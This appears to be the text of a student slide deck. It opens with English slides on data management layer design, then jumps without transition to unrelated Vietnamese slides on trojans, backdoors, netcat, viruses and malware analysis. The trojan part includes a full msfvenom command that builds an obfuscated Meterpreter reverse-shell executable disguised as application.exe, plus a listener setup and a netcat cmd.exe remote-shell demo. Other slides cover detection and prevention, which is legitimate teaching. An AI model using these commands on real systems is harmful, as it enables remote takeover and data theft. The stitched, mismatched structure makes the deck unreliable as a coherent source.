DATA MANAGEMENT

LAYER DESIGN
Nhóm 6
Lại Đức Long
Bạch Hoàng Hạ
Nông Nguyễn Nguyên Phương
Cái Xuân Trung
Nguyễn Anh Tuấn
Nguyễn Quang Du
 Objectives
■ Become familiar with several object persistence formats.
■ Be able to map problem domain objects to di fferent object persistence formats.
■ Be able to apply the steps of normalization to a relational database.
■ Be able to optimize a relational database for object storage and access.
■ Become familiar with indexes for relational databases.
■ Be able to estimate the size of a relational database.
■ Understand the affect of nonfunctional requirements on the data management layer.
■ Be able to design the data access and manipulation classes.
.
 01
OBJECT PERSISTENCE
FORMATS
 Sequential Files

• Sequential access files allow

sequential operations
– Read, write, and search
• Efficient for report writing
• Searches are not efficient because
an average of 50% of records have to
be accessed
• Two versions
– Ordered
– Unordered
 Random Access Files

• Allow only random or direct file

operations

• Good for finding and updating a

specific object

• Inefficient report writing

 Application File Types
• Master Files

• Look

- up files

• Transaction files

• Audit file

• History file
 Relational Databases
• Collection of tables
– Comprised of fields that define entities
– Primary key has unique values in each row of a table
– Foreign key is primary key of another table
• Tables related to each other
– Primary key field of a table is a field of another table and
called a foreign key
– Relationship established by a foreign key of one table
connecting to the primary key of another table
 Object-Relational Databases
• Object-relational database management systems (ORDBMSs) are relational database
management systems

• ORDBMSs have very good support for the typical data management operations

• Many of the ORDBMSs on the market still do not support all of the object-oriented
features that can appear in an object-oriented design
 Mặt lợi của backdoor
• Kiểm tra version của các ứng
dụng
• Xử lý bản quyền
• Một số website tích hợp
backdoor để thiết lập cấu hình
chỉ dành riêng cho khách hàng
đó
Mặt hại của backdoor
• Sử dụng backdoor để cài các
phần mềm độc hại
• Thu thập thông tin về bạn, các
trang web bạn truy cập trên
Internet, những thứ bạn tải
xuống, tệp bạn mở, tên người
dùng, mật khẩu và bất kỳ thứ gì
khác có giá trị.
• Sử dụng máy tính nạn nhân
trong 1 cuộc tấn công DDOS
Trojan là gì ?
 Trojan
Trojan là một loại phần mềm độc hại
thường được ngụy trang dưới dạng
phần mềm hợp pháp. Trojan có thể
được sử dụng bởi những kẻ trộm
mạng và tin tặc cố gắng truy cập vào
hệ thống của người dùng
Khi xâm nhập vào máy tính của bạn,
vi-rút Trojan hoạt động tương tự - nó
ẩn bên trong các chương trình dường
như vô hại hoặc cố gắng lừa bạn tải
xuống
MỤC ĐÍCH CỦA TROJAN
 CÁCH NHẬN BIẾT CUỘC
TẤN CÔNG BẰNG TROJAN
• Trình duyệt của máy tính chuyển hướng đến những trang không rõ.
• Trình Anti-Virus bị vô hiệu hóa hoặc thuộc tính của nó không hoạt động.
• Tài khoản và mật khẩu bị thay đổi hoặc không chứng thực được.
• Hình nền và background thay đổi.
• Xuất hiện các báo cáo mua lạ trong thẻ tín dụng của mình.
• Ổ CD-ROM mở và đóng bởi nó.
• Thanh Taskbar biến mất.
• Cửa sổ thiết lập màu sắc bị thay đổi.
CÁC CỔNG PHỔ BIẾN ĐƯỢC
SỬ DỤNG BỞI TROJAN
Sử dụng Kali Linux dùng để tấn
công Win 10 bằng Metaploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.128
LPORT=5555 -f exe -e x86/shikata_ga_nai -i 10 > application.exe
Sử dụng exploit(multi/handler) và payload
windows/meterpreter/reverse_tcp để nghe ngóng

Thiết lập các thông số yêu cầu

Sử dụng lệnh search –f *.txt
Qúa trình xâm nhập của
Trojan
Qúa trình xâm nhập của Trojan được thực hiện bởi một số bước. Các bước này được
hacker sử dụng để xâm nhiễm hệ thống mục tiêu:
B1: Tạo Trojan sử dụng Trojan Construction Toolkit.
B2: Tạo Dropper
B3: Tạo Wrapper
B4: Truyền nhiễm Trojan
B5: Kích hoạt Trojan
Sự triển khai của Trojan
 07
Các loại Trojan
Enter a sbtitle here if you need it
Một số loại Trojan phổ biến:
- Command Shell Trojan
- Defacement Trojan
- HTTP/ HTTPS Trojan
- Botnet Trojan
- Trojan-Proxy Server
- Remote Access Trojan
- Data-Sending Trojan
- Destructive Trojan
- Security software disabler
Trojan
- FTP Trojan
 08
Netcat
Enter a sbtitle here if you need it
Netcat là một trojan dạng dòng lệnh nhưng khá mạnh mẽ và dễ sử dụng. Trước đây, Netcat
được xem như một công cụ “sạch” nhưng do bị các hacker sử dụng nhiều vào các mục
tiêu không trong sáng nên hiện nay hầu hết chương trình phòng chống virus đều đưa
Netcat vào danh sách đen. Công cụ này có khả năng mở những cổng TCP hay UDP trên
máy tính bị nhiễm, và hacker sử dụng chương trình telnet để kết nối tới các cổng đã mở 8
và thực hiện nhiều thao tác nguy hiểm như truyền file, thực thi lệnh. Netcat có thể chạy
trên hệ thống Windows cũng như Linux, tương tác theo mô hình client / server:
Các tính năng ban đầu của netcat bao gồm:
- Kết nối đi hoặc đến, TCP hoặc UDP, đến hoặc từ
bất kỳ cổng nào
- Kiểm tra toàn bộ chuyển tiếp / đảo ngược DNS ,
với các cảnh báo thích hợp
- Khả năng sử dụng bất kỳ cổng nguồn cục bộ nào
- Khả năng sử dụng bất kỳ địa chỉ nguồn mạng nào
được cấu hình cục bộ
- Khả năng quét cổng tích hợp, với tính năng ngẫu
nhiên
- Tích hợp khả năng định tuyến nguồn rời
- Có thể đọc các đối số dòng lệnh từ đầu vào chuẩn
- Chế độ gửi chậm, một dòng sau mỗi N giây
- Kết xuất hex của dữ liệu đã truyền và đã nhận
- Khả năng tùy chọn để cho phép một dịch vụ
chương trình khác thiết lập kết nối
- Người trả lời tùy chọn -options telnet
 Demo Netcat
 Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn -
l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e cmd.exe
Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã
định, chẳng hạn như 8080
Thế nào là “Wrapping” ?
 Thế nào là “Wrapping” ?
● Wrapper là một gói phần mềm được sử dụng để đính kèm Tronjan.

● Thông thường, game và những chương trình có tính hấp dẫn (phim s*x) được sử
dụng là wrapper.

● Để có thế phát tán các mã độc hay trojan / backdoor hacker thường đính kèm
những công cụ này vào những công cụ hợp lệ khác
 Những công cụ đóng gói trojan :

1 2 3
Graffiti Silk Rope 2000 EliTeWrap

4 5
AutoIT
IconPlus
Trojan Construction
Kit và Trojan Maker
 Trojan Construction Kit và Trojan Maker
● Trojan construction kit va trojan maker là những công cụ mà các hacker dùng để
t75 tạo ra các biến thể trojan / backdoor nguy hiểm của riêng mình

● Một số công cụ dùng để tạo trojan như Senna Spy Generator, Trojan Horse
Construction Kit, Pandora’s Box
Phòng Chống
Trojan
 Phòng Chống Trojan
● Hiện nay có nhiều công cụ thương mại của phần mềm chống Virus, cũng như phát
hiện các loại spyware, trojan, backdor và mã độc hại khác

● Điểm chính trong cơ chế hoạt động của Trojan và Backdor là cài đặt một chương
trình trên máy tính. Vì thế cách tốt nhất để tránh nhiệm trojan là không nên cho
phép user bình thường có được quyền cài đặt chương trình tùy ý
 Các khuyến cáo để phòng chống Trojan hiệu quả :
● Hạn chế sử dụng chung máy tính, cài đặt mật khẩu bảo vệ.
● Không mở các tập tin lạ không rõ nguồn gốc, chú ý các file có đuôi mở rộng: exe,
bat,com,…
● Không vào các trang web lạ, không click vào các đường link lạ.
● Không cài đặt các phần mềm lạ.
● Quét các port đang mở, các tiến trình đang chạy, những thay đổi với Registry,
những hoạt động mạng, …
● Chạy các phần mềm diệt Trojan.
Những Công Cụ Giám
Sát Port Và Dò Tìm
Trojan
Fport

● Công cụ miễn phí của

Foundstone báo cáo về tình
trạng của tất cả các cổng
TCP / UDP đang mở cùng
với dịch vụ tương ứng hoạt
động trên những cổng này.
TCP View

● Chương trình hoạt động trên

hệ điều hành Windows hiển
thị chi tiết các điểm đầu cuối
tham gia truyền thông trên
TCP / UDP
TCP View
TCP View
TCP View
TCP View
Process Viewer

● Là ứng dụng dùng để giám sát

các tiến trình đang hoạt động,
đây là công cụ dạng dòng lệnh
rất hay, có khả năng kill
(đóng) các tiến trình nguy
hiểm.
Currport

● Currport liệt kê tất cả các

cổng TCP/IP và UDP đang
mở trên máy tính của bạn.
Với mỗi cổng trong danh
sách.
Những Công Cụ Giám Sát Port Và Dò Tìm Trojan

● Inzider : Là một ứng dụng

● Tripwire : Ứng dụng trên
hữu ích liệt kê những tiến
Linux dùng để kiểm tra tính
trình đang hoạt động trên hệ
toàn vẹn của hệ thống tập
thống Windows và các cổng
tin.
tương ứng.
Phòng Chống Trojan
Bằng Cách Kiểm Tra
Tính Toàn Vẹn Của
tập Tin
Windows File Protection

● WFP kiểm tra tính toàn vẹn

của tập tin khi có sự tác
động đến các tập tin SYS,
DLL, OCX, TTF hay EXE
Virus và Worm
Tổng quan chung về
virus
 Giới thiệu về virus
● Virus máy tính là một chương trình máy tính có khả năng tự sao chép chính nó từ
đối tượng lây nhiễm này sang đối tượng lây nhiễm khác.
 Virus máy tính lây lan như thế nào ?
● Virus máy tính có thể lây lan vào máy tính qua email, qua các file tải về từ
Internet hay copy từ máy khác về, và cũng có thể lợi dụng các lỗ hổng phần mềm
để xâm nhập từ xa, cài đặt lây nhiễm lên máy tính một cách âm thầm
 Virus máy tính phá hoại những gì ?
● Dù ít hay nhiều thì virus cũng được sinh ra để phục vụ những mục đích
không tốt. Các virus thế hệ đầu tiên có thể tàn phá nặng nề dữ liệu, ổ đĩa, hệ
thống, hoặc đơn giản hơn chỉ là làm cho màn hình bị lỗi hiển thị với nhiều
nhân bản để “ghi điểm”. Tuy nhiên thì các virus như vậy hầu như không còn
tồn tại nữa . Các virus ngày nay thường phục vụ cho những mục đích về
kinh tế hoặc phá hoại cụ thể
Dấu hiệu nhận biết khi máy tính bị nhiễm virus ?

●Truy xuất tập tin, mở các chương trình ứng dụng chậm.
●Khi duyệt web có các trang lạ xuất hiện
●Duyệt web chậm, nội dung các trang web hiển thị lên màn
hình chậm
●Góc phải màn hình xuất hiện cảnh báo : “Your computer is
infected” hoặc xuất hiện cửa sổ : “Virus Alert”
● Các file lạ tự động sinh ra khi mở ổ đĩa USB
● Xuất hiện các file có phần mở rộng .exe với tên trùng với tên các
thư mục
Sự khác biệt giữa
virus và worm
 Virus Worm

● Có khả năng lây lan (sao ● Có khả năng lây lan (sao
chép từ máy tính này sang chép từ máy tính này sang
máy tính khác máy tính khác

● Lây nhiễm qua tệp ● Lây nhiễm qua mạng

Phân loại virus
● Một virus máy tính có thể lây nhiễm vào các thành phần sau đây của
hệ thống
 System sector

 Tập tin

 Macros (Như MS Word macro)

 Các tập tin hay hàm thư viên của hệ thống như DLL,INI

 Disk cluster

 Tập tin BAT

 Mã nguồn ứng dụng

 Các loại virus được phân chia theo cách thức lây lan :

● Polymorphic ● Cavity (space-filler)

● Stealth ● Tunneling
● Fast & Slow Infector ● Camouflage
● Armored ● NTFS & Active Directory
● Multipartie
Cách phòng chống và
ngăn chạn tác hại của
virus máy tính
 Cách phòng chống và ngăn chạn tác hại của virus máy tính

a) Sử dụng phần mềm diệt virus máy tính

b) Sử dụng tường lửa cá nhân

c) Cập nhật các bản vá lỗi của hệ điều hành

d) Theo kinh nghiệm sử dụng máy tính

 REVERSE
ENGINEERING
 REVERSE ENGINEERING LÀ GÌ
● RE là quá trình tìm hiểu những công nghệ được sử dụng bởi 1 thiết bị, 1 đối
tượng hoặc 1 hệ thống thông qua việc phân tích cấu trúc, các chức năng và
hoạt động của nó.

● RE là 1 khái niệm rất rộng, bao gồm cả RE phần cứng và RE phần mềm

● Việc phân tích hoạt động cụ thể của một hệ thống hay 1 chương trình sẽ
được sử dụng trong việc bảo trì chính hệ thống hay chương trình đó
 ỨNG DỤNG CỦA RE

● Phân tích malware

● Tìm hiểu cách thức hoạt động của một modul hoặc một hệ thống
 CÁC VẤN ĐỀ CHÍNH CỦA RE
● Với mỗi một nền tảng, hệ điều hành khác nhau ta có các chương trình được
xây dựng khác nhau, thực thi theo cách khác nhau

● Với đặc trưng của mỗi nền tảng, ta có những hướng khác nhau để tiếp cận,
những công cụ khác nhau để trợ giúp cho công việc.

● Với các hệ điều hành khác nhau ta sử dụng những công cụ khác nhau

● Những chương trình viết bằng ngôn ngữ khác nhau sẽ có những công cụ RE
khác nhau
MALWARE
ANALYSIS
 KHÁI QUÁT

● Là quá trình xác định phần mềm độc hại cho đến khi xác minh rằng phần
mềm độc hại đã bị loại bỏ hoàn toàn

● Mục tiêu: thu được thông tin chi tiết và quan sát hành vi của phần mềm độc
hại
 QUÁ TRÌNH

● Preparing the Testbed

Chuyên gia bảo mật chuẩn bị sẵn
máy ảo như một hệ điều hành máy chủ,
nơi phân tích phần mềm độc hại động
sẽ được thực hiện bằng cách thực thi
phần mềm độc hại trên hệ điều hành
khách. Hệ điều hành máy chủ này được
cách ly khỏi mạng khác để quan sát
hành vi của phần mềm độc hại bằng
cách cách ly phần mềm độc hại khỏi
mạng.
 QUÁ TRÌNH
● Phân tích tĩnh
Được thực hiện bằng cách phân mảnh
tài nguyên của tệp nhị phân mà không thực
thi nó và nghiên cứu từng thành phần. Trình
tháo gỡ như IDA được sử dụng để tháo rời
tệp nhị phân.
● Phân tích động
Được thực hiện bằng cách thực thi phần
mềm độc hại trên máy chủ và quan sát hành
vi của phần mềm độc hại trong môi trường
Sandbox
 MỤC TIÊU
● Chẩn đoán mức độ nghiêm trọng của mối đe dọa hoặc mức độ tấn công.

● Chẩn đoán loại Phần mềm độc hại.

● Phạm vi tấn công

● Phòng thủ được xây dựng để bảo mật hệ thống và mạng của tổ chức.

● Tìm ra nguyên nhân gốc rễ.

● Đã xây dựng các hành động ứng phó Sự cố.

● Phát triển Anti-malware để loại bỏ.

 SHEEP DIPPING
● Là quá trình phân tích tệp và gói tin bị nghi ngờ
chống lại vi-rút và phần mềm độc hại trước khi
cho phép chúng có sẵn cho người dùng trong
một môi trường bị cô lập
● Quá trình phân tích này được thực hiện trên một
máy tính chuyên dụng. Đây là tuyến phòng thủ
ban đầu đang chạy, với tính toán được bảo mật
cao cùng với giám sát cổng, giám sát tệp, chống
vi-rút và các chương trình bảo mật khác.
● Hệ thống nhúng cừu có thể được coi là một
trường hợp đặc biệt của hộp cát , được sử dụng
để kiểm tra phần mềm độc hại.
DEMO